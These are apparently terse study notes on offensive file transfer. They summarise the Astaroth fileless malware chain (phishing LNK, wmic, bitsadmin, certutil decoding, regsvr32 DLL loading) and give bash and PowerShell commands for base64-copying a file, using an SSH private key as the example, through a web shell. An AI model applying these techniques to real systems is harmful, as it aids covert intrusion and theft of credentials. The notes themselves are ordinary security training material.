fileless threat- in system tool to attack. file not present in system but runs in memory.
spear-phishing email> link to LNK file>executes wmic tool with /Format > allows download&execution of js code>downloads payload abusing bitsadmin tool
//payload base64 encoded and decoded with certutil . results in dll files. > regsvr32 tool to load one decoded dll > that chain loads others till final payload. Astaroth > injected to userinit ps.
//multiple methods
file size less: encode file to base64 string > copy it from terminal > decode . Check md5sum for integrity.
check hash : md5sum id_rsa
encode : cat id_rsa | base64 -w 0 ; echo
copy and paste contents to pwsh
decode:
$decodedBytes = [Convert]::FromBase64String($base64String)
$decodedText = [System.Text.Encoding]::ASCII.GetString($decodedBytes)
$decodedText
check md5 hash: Get-FileHash \path\to\file -Algorithm md5
cons- cmd.exe has max string length 8191. web shell errors on large strings.
given: outbound through firewall allowed on http/s